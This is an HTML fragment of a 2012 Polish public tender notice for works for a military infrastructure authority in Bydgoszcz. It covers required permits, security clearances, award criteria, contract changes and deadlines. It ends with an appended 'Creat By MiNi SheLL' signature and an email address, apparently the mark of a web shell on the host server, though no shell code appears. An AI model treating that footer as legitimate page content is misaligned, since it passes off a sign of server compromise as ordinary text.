<li style="margin-right: 20px;"><p class="justify"><span class="bold">III.4.3.2)</span> zaświadczenie właściwego organu sądowego lub administracyjnego miejsca zamieszkania albo zamieszkania osoby, której dokumenty dotyczą, w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy - wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert - albo oświadczenie złożone przed notariuszem, właściwym organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego odpowiednio miejsca zamieszkania osoby lub kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, jeżeli w miejscu zamieszkania osoby lub w kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, nie wydaje się takiego zaświadczenia</p></li></ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1. W celu potwierdzenia posiadania zezwoleń wynikających z ustawy o odpadach Wykonawca do oferty załączy oświadczenie o spełnieniu wymogów ustawy z dnia 27 kwietnia 2001r. o odpadach (Dz. U. z dnia 20 czerwca 2001r. z późn. zm.) i posiadaniu niżej wymienionych dokumentów wydanych przez właściwy organ:
a)	Decyzji zatwierdzającej program gospodarki odpadami niebezpiecznymi, jeżeli wytwarza odpady niebezpieczne w ilości powyżej 0,1 Mg rocznie;
b)	Decyzji zatwierdzającej program gospodarki odpadami, jeżeli prowadzi działalność polegającą na świadczeniu usług w zakresie budowy, rozbiórki, remontu obiektów, czyszczenia zbiorników lub urządzeń oraz sprzątania, konserwacji i napraw, a także przetwarzania odpadów zawierających azbest w urządzeniach przewoźnych;
c)	Informacji o wytwarzanych odpadach oraz o sposobach gospodarowania wytworzonymi odpadami, jeżeli wytwarza odpady niebezpieczne w ilości do 0,1 Mg rocznie albo powyżej 5 Mg rocznie odpadów innych niż niebezpieczne;
d)	Pozwolenia na wytwarzanie odpadów, które powstają w związku z eksploatacją instalacji, jeżeli wytwarza powyżej 1 Mg odpadów niebezpiecznych rocznie lub powyżej 5 tys. Mg odpadów innych niż niebezpieczne rocznie;
e)	Pozwolenia na prowadzenie działalności w zakresie odzysku lub unieszkodliwiania odpadów, jeżeli zakres robót to przewiduje lub wykonawca ma zamiar wykorzystać powstałe odpady do innych celów;
f)	Zezwolenia na prowadzenie działalności w zakresie zbierania lub transportu odpadów, jeżeli taką działalność w przypadku realizacji zadania będzie prowadził;
- lub w przypadku gdy Wykonawca zamierza powierzyć wykonanie obowiązku gospodarowania odpadami innemu podmiotowi  (zgodnie z art. 25 ustawy o odpadach)  do oferty należy załączyć oświadczenie o zawarciu lub zamiarze zawarcia umowy z podmiotem, któremu wykonawca powierzy ww. obowiązek
2)	Wskazanie osoby proponowanej na stanowisko kierownika robót                      wraz z informacjami na temat jej kwalifikacji zawodowych niezbędnych do wykonania zamówienia oraz informacją o podstawie do dysponowania tą osobą - wzór został załączony do formularza oferty (załącznik nr 4).
3)	wykaz wszystkich osób przewidzianych do dostępu do informacji niejawnych przy realizacji zamówienia, z podaniem numerów, klauzul tajności i dat wystawienia poświadczeń bezpieczeństwa lub upoważnień do klauzuli ZASTRZEŻONE (załącznik nr 4);
4)	kserokopie właściwych poświadczeń bezpieczeństwa lub upoważnień do dostępu do informacji niejawnych;
5)	kserokopie zaświadczeń o przeszkoleniu w zakresie ochrony informacji niejawnych (w przypadku legitymowania się upoważnieniami - zaświadczenia powinny być zgodne z art. 20 ust. 1 ustawy).</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zamawiający przewiduje możliwość dokonania zmian zawartej umowy w przypadku:
a) urzędowej zmiany podatku VAT;
b) w przypadku wyłączeń obiektów z użytkowania bądź przekazania ich w inny zarząd, lub poza wojsko
c) zmiana numeru konta, adresu firmy - w przypadku poinformowania Zamawiającego pisemnie o zaistniałej zmianie;
d) zmiana osób funkcyjnych - kierownik budowy, (po pisemnym poinformowaniu o zaistniałej zmianie), inspektor nadzoru;
e) zmiana terminu wykonania przedmiotu umowy, jeżeli dochowanie terminu określonego w umowie jest niemożliwe z uwagi na siłę wyższą lub inne okoliczności niezależne od Wykonawcy, lub których Wykonawca przy zachowaniu należytej staranności nie był w stanie uniknąć lub przewidzieć, w tym dotyczące niesprzyjających warunków atmosferycznych wód gruntowych, jak również inne przeszkody lub utrudnienia w wykonywaniu przedmiotu umowy, spowodowane przez osoby trzecie.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.rzi.hg.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> RZI Bydgoszcz, ul. Podchorążaych 33 pok. nr 311.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 20.08.2012 godzina 10:00, miejsce: siedziba Zamawiającego pok. nr 2 - kancelaria.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> nie dotyczy.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com